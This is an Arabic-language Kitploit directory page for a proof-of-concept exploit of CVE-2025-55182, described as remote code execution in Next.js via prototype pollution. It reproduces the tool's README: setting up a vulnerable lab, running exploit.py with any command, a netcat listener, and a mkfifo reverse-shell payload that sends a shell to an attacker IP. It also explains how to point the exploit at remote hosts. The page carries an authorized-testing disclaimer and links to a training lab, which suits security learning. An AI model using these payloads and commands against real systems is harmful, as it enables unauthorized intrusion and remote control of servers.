Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
React2Shell-CVE-2025-55182 — استغلال دليل المفهوم لـ CVE-2025-55182 يُظهر تنفيذ التعليمات البرمجية عن بُعد في Next.js عبر التلوث النموذجي. يتضمن مختبرًا ضعيفًا مُعدًا مسبقًا للاختبار المصرح به وتوليد شل عكسية. | Kitploit
أدوات/GitHubGitHub/rahul-securify/react2shell-cve-2025-55182
توليد الحمولةالاستغلالاستغلال تطبيقات الويبCTFالتعلم والتعليممختبرات وتدريب عملي
GitHubrahul-securify/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

استغلال دليل المفهوم لـ CVE-2025-55182 يُظهر تنفيذ التعليمات البرمجية عن بُعد في Next.js عبر التلوث النموذجي. يتضمن مختبرًا ضعيفًا مُعدًا مسبقًا للاختبار المصرح به وتوليد شل عكسية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

React2Shell CVE-2025-55182

أداة إثبات المفهوم توضح ثغرة تنفيذ التعليمات البرمجية عن بُعد في تطبيقات Next.js من خلال تلوث النموذج الأولي في خط أنابيب عرض مكونات خادم React.

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية والاختبار المصرح به فقط. الاستخدام غير المصرح به ضد الأنظمة التي لا تملكها أو ليس لديك إذن لاختبارها غير قانوني.

📋 المتطلبات الأساسية

  • Node.js (الإصدار 16 أو أحدث)
  • Python 3.6+
  • netcat (للقذائف العكسية)
  • تطبيق Next.js ضعيف (مرفق في هذا المستودع)

🚀 بداية سريعة

الخيار 1: استخدام المختبر المُعد مسبقًا

1. استنساخ المستودع

root@kitploit:~
git clone https://github.com/securifyai/React2Shell-CVE-2025-55182.git
cd React2Shell-CVE-2025-55182

الخيار 2: إنشاء الخادم من البداية

root@kitploit:~
# Create a new Next.js app with the vulnerable version
npm create [email protected] react2shell-lab
# Accept all defaults when prompted
cd react2shell-lab

ملاحظة: المختبر المُعد مسبقًا يتضمن بالفعل الكود الضعيف اللازم. إذا كنت تقوم بالإنشاء من البداية، ستحتاج إلى إضافة المكونات الضعيفة يدويًا.

2. تثبيت التبعيات

root@kitploit:~
cd react2shell-lab
npm install

3. تشغيل الخادم الضعيف

في الطرفية 1:

root@kitploit:~
npm run dev

يجب أن يبدأ الخادم على http://localhost:3000

🔧 استغلال الثغرة

تنفيذ الأوامر الأساسية

  1. يحتوي المستودع على ملف exploit.py يوضح الثغرة. قم بتعديل المتغير COMMAND في الملف إلى الأمر الذي تريده:

    root@kitploit:~
    COMMAND = 'whoami'  # Change this to any command you want to execute
    
  2. قم بتشغيل الأداة:

    root@kitploit:~
    python3 exploit.py
    

القذيفة العكسية

  1. قم بإعداد مستمع netcat في طرفية جديدة:

    root@kitploit:~
    nc -nvlp 4444
    
  2. قم بتعديل ملف exploit.py وقم بتحديث الأمر إلى حمولة القذيفة العكسية الخاصة بك:

    root@kitploit:~
    COMMAND = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f'
    

    استبدل YOUR_IP بعنوان IP الخاص بجهازك المحلي.

  3. قم بتشغيل الأداة:

    root@kitploit:~
    python3 exploit.py
    

🛠️ استخدام متقدم

اختبار الأهداف البعيدة

قم بتعديل المتغير HOST في سكريبت الاستغلال لاستهداف الخوادم البعيدة:

root@kitploit:~
HOST = 'target-ip-address'  # Replace with target IP
PORT = 3000  # Default Next.js port

الأوامر الشائعة

  • عرض محتويات الدليل: ls -la
  • الحصول على معلومات النظام: uname -a
  • الحصول على المستخدم الحالي: whoami
  • الحصول على معلومات الشبكة: ifconfig أو ip a

🔍 استكشاف الأخطاء وإصلاحها

  • تم رفض الاتصال: تأكد من أن الخادم الهدف قيد التشغيل ويمكن الوصول إليه
  • الأمر غير موجود: قد لا يحتوي النظام الهدف على بعض الثنائيات المثبتة
  • لا يوجد مخرجات: ربما تم تنفيذ الأمر ولكنه لم ينتج أي مخرجات

📚 المراجع

  • CVE-2025-55182
  • النصائح الأمنية لـ Next.js
  • تلوث النموذج الأولي في JavaScript

📄 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.

هذا الإصدار يطلب إدخال المستخدم للهدف البعيد وعنوان IP للمهاجم والمنافذ. كما تم تقليص نص الطلب (body_parts) قليلاً في هذا الإصدار.

المصادر:

https://www.averlon.ai/blog/react2shell-cve-2025-55182-explained

https://tryhackme.com/room/react2shellcve202555182

تنزيل الأداة